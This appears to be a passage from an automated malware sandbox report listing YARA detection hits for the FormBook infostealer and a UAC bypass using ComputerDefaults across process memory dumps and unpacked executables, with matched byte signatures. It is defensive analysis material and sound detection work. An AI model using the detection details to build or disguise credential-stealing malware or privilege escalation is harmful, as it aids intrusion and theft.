0000000B.00000000.319230317.00000000023A8000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_UACBypassusingComputerDefaults	Yara detected UAC Bypass using ComputerDefaults	Joe Security
00000014.00000000.433242777.000000000D48F000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000014.00000000.433242777.000000000D48F000.00000040.00000001.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0xe7f0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x7b87:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000014.00000000.433242777.000000000D48F000.00000040.00000001.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x7985:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x7431:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x7a87:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x7bff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x667c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xd437:$sequence_8: 3C 54 74 04 3C 74 75 F4 0xe55a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000014.00000000.433242777.000000000D48F000.00000040.00000001.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x9e89:$sqlite3step: 68 34 1C 7B E1 0x9fbc:$sqlite3step: 68 34 1C 7B E1 0x9ecb:$sqlite3text: 68 38 2A 90 C5 0xa013:$sqlite3text: 68 38 2A 90 C5 0x9ee2:$sqlite3blob: 68 53 D8 7F 8C 0xa035:$sqlite3blob: 68 53 D8 7F 8C
00000005.00000000.300389282.0000000050410000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000005.00000000.300389282.0000000050410000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6631:$a1: 3C 30 50 4F 53 54 74 09 40 0x1d7f0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa96f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x16b87:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000005.00000000.300389282.0000000050410000.00000040.00000400.00020000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x16985:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x16431:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x16a87:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x16bff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa53a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1567c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb282:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1c437:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1d55a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000005.00000000.300389282.0000000050410000.00000040.00000400.00020000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18e89:$sqlite3step: 68 34 1C 7B E1 0x18fbc:$sqlite3step: 68 34 1C 7B E1 0x18ecb:$sqlite3text: 68 38 2A 90 C5 0x19013:$sqlite3text: 68 38 2A 90 C5 0x18ee2:$sqlite3blob: 68 53 D8 7F 8C 0x19035:$sqlite3blob: 68 53 D8 7F 8C
0000000B.00000000.333596734.0000000003C01000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000B.00000000.333596734.0000000003C01000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x32175:$a1: 3C 30 50 4F 53 54 74 09 40 0x49334:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x364b3:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x426cb:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
0000000B.00000000.333596734.0000000003C01000.00000004.00001000.00020000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x424c9:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x41f75:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x425cb:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x42743:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x3607e:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x411c0:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x36dc6:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x47f7b:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x4909e:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000B.00000000.333596734.0000000003C01000.00000004.00001000.00020000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x449cd:$sqlite3step: 68 34 1C 7B E1 0x44b00:$sqlite3step: 68 34 1C 7B E1 0x44a0f:$sqlite3text: 68 38 2A 90 C5 0x44b57:$sqlite3text: 68 38 2A 90 C5 0x44a26:$sqlite3blob: 68 53 D8 7F 8C 0x44b79:$sqlite3blob: 68 53 D8 7F 8C
0000001E.00000002.537830907.00000000034D0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000001E.00000002.537830907.00000000034D0000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6631:$a1: 3C 30 50 4F 53 54 74 09 40 0x1d7f0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa96f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x16b87:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
0000001E.00000002.537830907.00000000034D0000.00000004.00000800.00020000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x16985:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x16431:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x16a87:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x16bff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa53a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1567c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb282:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1c437:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1d55a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000001E.00000002.537830907.00000000034D0000.00000004.00000800.00020000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18e89:$sqlite3step: 68 34 1C 7B E1 0x18fbc:$sqlite3step: 68 34 1C 7B E1 0x18ecb:$sqlite3text: 68 38 2A 90 C5 0x19013:$sqlite3text: 68 38 2A 90 C5 0x18ee2:$sqlite3blob: 68 53 D8 7F 8C 0x19035:$sqlite3blob: 68 53 D8 7F 8C
00000000.00000002.308846513.0000000003A5C000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000000.00000002.308846513.0000000003A5C000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x9fa9:$a1: 3C 30 50 4F 53 54 74 09 40 0x21168:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xe2e7:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x1a4ff:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000000.00000002.308846513.0000000003A5C000.00000004.00001000.00020000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x1a2fd:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x19da9:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x1a3ff:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1a577:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xdeb2:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x18ff4:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xebfa:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1fdaf:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x20ed2:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000000.00000002.308846513.0000000003A5C000.00000004.00001000.00020000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x1c801:$sqlite3step: 68 34 1C 7B E1 0x1c934:$sqlite3step: 68 34 1C 7B E1 0x1c843:$sqlite3text: 68 38 2A 90 C5 0x1c98b:$sqlite3text: 68 38 2A 90 C5 0x1c85a:$sqlite3blob: 68 53 D8 7F 8C 0x1c9ad:$sqlite3blob: 68 53 D8 7F 8C
0000001E.00000002.532023661.0000000002FA0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000001E.00000002.532023661.0000000002FA0000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6631:$a1: 3C 30 50 4F 53 54 74 09 40 0x1d7f0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa96f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x16b87:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
0000001E.00000002.532023661.0000000002FA0000.00000040.80000000.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x16985:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x16431:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x16a87:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x16bff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa53a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1567c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb282:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1c437:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1d55a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000001E.00000002.532023661.0000000002FA0000.00000040.80000000.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18e89:$sqlite3step: 68 34 1C 7B E1 0x18fbc:$sqlite3step: 68 34 1C 7B E1 0x18ecb:$sqlite3text: 68 38 2A 90 C5 0x19013:$sqlite3text: 68 38 2A 90 C5 0x18ee2:$sqlite3blob: 68 53 D8 7F 8C 0x19035:$sqlite3blob: 68 53 D8 7F 8C
Process Memory Space: 1a#U00bb.exe PID: 6128	JoeSecurity_UACBypassusingComputerDefaults	Yara detected UAC Bypass using ComputerDefaults	Joe Security
Process Memory Space: 1a#U00bb.exe PID: 6128	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x537b1:$a1: 3C 30 50 4F 53 54 74 09 40 0xc9806:$a1: 3C 30 50 4F 53 54 74 09 40
Process Memory Space: cmd.exe PID: 5692	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x161:$a1: 3C 30 50 4F 53 54 74 09 40 0x2bca2:$a1: 3C 30 50 4F 53 54 74 09 40 0xbc3c6:$a1: 3C 30 50 4F 53 54 74 09 40
Process Memory Space: Djfypqyfx.exe PID: 5068	JoeSecurity_UACBypassusingComputerDefaults	Yara detected UAC Bypass using ComputerDefaults	Joe Security
Process Memory Space: Djfypqyfx.exe PID: 5068	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x16d6e:$a1: 3C 30 50 4F 53 54 74 09 40
Process Memory Space: Djfypqyfx.exe PID: 5460	JoeSecurity_UACBypassusingComputerDefaults	Yara detected UAC Bypass using ComputerDefaults	Joe Security
Process Memory Space: Djfypqyfx.exe PID: 5460	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x1d614:$a1: 3C 30 50 4F 53 54 74 09 40 0x220f7:$a1: 3C 30 50 4F 53 54 74 09 40
Process Memory Space: wscript.exe PID: 1428	Windows_Trojan_Formbook_1112e116	unknown	unknown	0xf0eb0:$a1: 3C 30 50 4F 53 54 74 09 40 0x152398:$a1: 3C 30 50 4F 53 54 74 09 40 0x1533a1:$a1: 3C 30 50 4F 53 54 74 09 40
Click to see the 75 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
5.0.cmd.exe.50410000.0.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
5.0.cmd.exe.50410000.0.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x5831:$a1: 3C 30 50 4F 53 54 74 09 40 0x1c9f0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x9b6f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x15d87:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
5.0.cmd.exe.50410000.0.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x15b85:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15631:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15c87:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x15dff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x973a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1487c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa482:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b637:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c75a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
5.0.cmd.exe.50410000.0.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18089:$sqlite3step: 68 34 1C 7B E1 0x181bc:$sqlite3step: 68 34 1C 7B E1 0x180cb:$sqlite3text: 68 38 2A 90 C5 0x18213:$sqlite3text: 68 38 2A 90 C5 0x180e2:$sqlite3blob: 68 53 D8 7F 8C 0x18235:$sqlite3blob: 68 53 D8 7F 8C
5.0.cmd.exe.50410000.1.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
5.0.cmd.exe.50410000.1.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x5831:$a1: 3C 30 50 4F 53 54 74 09 40 0x1c9f0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x9b6f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x15d87:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
5.0.cmd.exe.50410000.1.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x15b85:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15631:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15c87:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x15dff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x973a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1487c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa482:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b637:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c75a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
5.0.cmd.exe.50410000.1.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18089:$sqlite3step: 68 34 1C 7B E1 0x181bc:$sqlite3step: 68 34 1C 7B E1 0x180cb:$sqlite3text: 68 38 2A 90 C5 0x18213:$sqlite3text: 68 38 2A 90 C5 0x180e2:$sqlite3blob: 68 53 D8 7F 8C 0x18235:$sqlite3blob: 68 53 D8 7F 8C
5.0.cmd.exe.50410000.2.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
5.0.cmd.exe.50410000.2.raw.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6631:$a1: 3C 30 50 4F 53 54 74 09 40 0x1d7f0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa96f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x16b87:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
5.0.cmd.exe.50410000.2.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x16985:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x16431:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x16a87:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x16bff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa53a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1567c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb282:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1c437:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1d55a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
5.0.cmd.exe.50410000.2.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18e89:$sqlite3step: 68 34 1C 7B E1 0x18fbc:$sqlite3step: 68 34 1C 7B E1 0x18ecb:$sqlite3text: 68 38 2A 90 C5 0x19013:$sqlite3text: 68 38 2A 90 C5 0x18ee2:$sqlite3blob: 68 53 D8 7F 8C 0x19035:$sqlite3blob: 68 53 D8 7F 8C
5.2.cmd.exe.50410000.4.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
5.2.cmd.exe.50410000.4.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x5831:$a1: 3C 30 50 4F 53 54 74 09 40 0x1c9f0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x9b6f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x15d87:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
5.2.cmd.exe.50410000.4.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x15b85:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15631:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15c87:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x15dff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x973a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1487c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa482:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b637:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c75a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
5.2.cmd.exe.50410000.4.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18089:$sqlite3step: 68 34 1C 7B E1 0x181bc:$sqlite3step: 68 34 1C 7B E1 0x180cb:$sqlite3text: 68 38 2A 90 C5 0x18213:$sqlite3text: 68 38 2A 90 C5 0x180e2:$sqlite3blob: 68 53 D8 7F 8C 0x18235:$sqlite3blob: 68 53 D8 7F 8C
5.0.cmd.exe.50410000.0.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
5.0.cmd.exe.50410000.0.raw.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6631:$a1: 3C 30 50 4F 53 54 74 09 40 0x1d7f0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa96f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x16b87:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
5.0.cmd.exe.50410000.0.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x16985:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x16431:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x16a87:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x16bff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa53a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1567c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb282:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1c437:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1d55a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
5.0.cmd.exe.50410000.0.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18e89:$sqlite3step: 68 34 1C 7B E1 0x18fbc:$sqlite3step: 68 34 1C 7B E1 0x18ecb:$sqlite3text: 68 38 2A 90 C5 0x19013:$sqlite3text: 68 38 2A 90 C5 0x18ee2:$sqlite3blob: 68 53 D8 7F 8C 0x19035:$sqlite3blob: 68 53 D8 7F 8C
5.2.cmd.exe.50410000.4.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
5.2.cmd.exe.50410000.4.raw.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6631:$a1: 3C 30 50 4F 53 54 74 09 40 0x1d7f0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa96f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x16b87:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
5.2.cmd.exe.50410000.4.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x16985:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x16431:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x16a87:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x16bff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa53a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1567c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb282:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1c437:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1d55a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
5.2.cmd.exe.50410000.4.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18e89:$sqlite3step: 68 34 1C 7B E1 0x18fbc:$sqlite3step: 68 34 1C 7B E1 0x18ecb:$sqlite3text: 68 38 2A 90 C5 0x19013:$sqlite3text: 68 38 2A 90 C5 0x18ee2:$sqlite3blob: 68 53 D8 7F 8C 0x19035:$sqlite3blob: 68 53 D8 7F 8C
5.0.cmd.exe.50410000.1.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
5.0.cmd.exe.50410000.1.raw.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6631:$a1: 3C 30 50 4F 53 54 74 09 40 0x1d7f0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa96f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x16b87:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
5.0.cmd.exe.50410000.1.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x16985:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x16431:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x16a87:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x16bff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa53a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1567c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb282:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1c437:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1d55a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
5.0.cmd.exe.50410000.1.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18e89:$sqlite3step: 68 34 1C 7B E1 0x18fbc:$sqlite3step: 68 34 1C 7B E1 0x18ecb:$sqlite3text: 68 38 2A 90 C5 0x19013:$sqlite3text: 68 38 2A 90 C5 0x18ee2:$sqlite3blob: 68 53 D8 7F 8C 0x19035:$sqlite3blob: 68 53 D8 7F 8C
0.2.1a#U00bb.exe.2637778.0.raw.unpack	JoeSecurity_UACBypassusingComputerDefaults	Yara detected UAC Bypass using ComputerDefaults	Joe Security
5.0.cmd.exe.50410000.2.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
5.0.cmd.exe.50410000.2.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x5831:$a1: 3C 30 50 4F 53 54 74 09 40 0x1c9f0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x9b6f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x15d87:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
5.0.cmd.exe.50410000.2.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x15b85:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15631:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15c87:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x15dff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x973a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1487c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa482:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b637:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c75a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
5.0.cmd.exe.50410000.2.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18089:$sqlite3step: 68 34 1C 7B E1 0x181bc:$sqlite3step: 68 34 1C 7B E1 0x180cb:$sqlite3text: 68 38 2A 90 C5 0x18213:$sqlite3text: 68 38 2A 90 C5 0x180e2:$sqlite3blob: 68 53 D8 7F 8C 0x18235:$sqlite3blob: 68 53 D8 7F 8C
0.2.1a#U00bb.exe.2637778.0.unpack	JoeSecurity_UACBypassusingComputerDefaults	Yara detected UAC Bypass using ComputerDefaults	Joe Security
5.0.cmd.exe.50410000.3.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
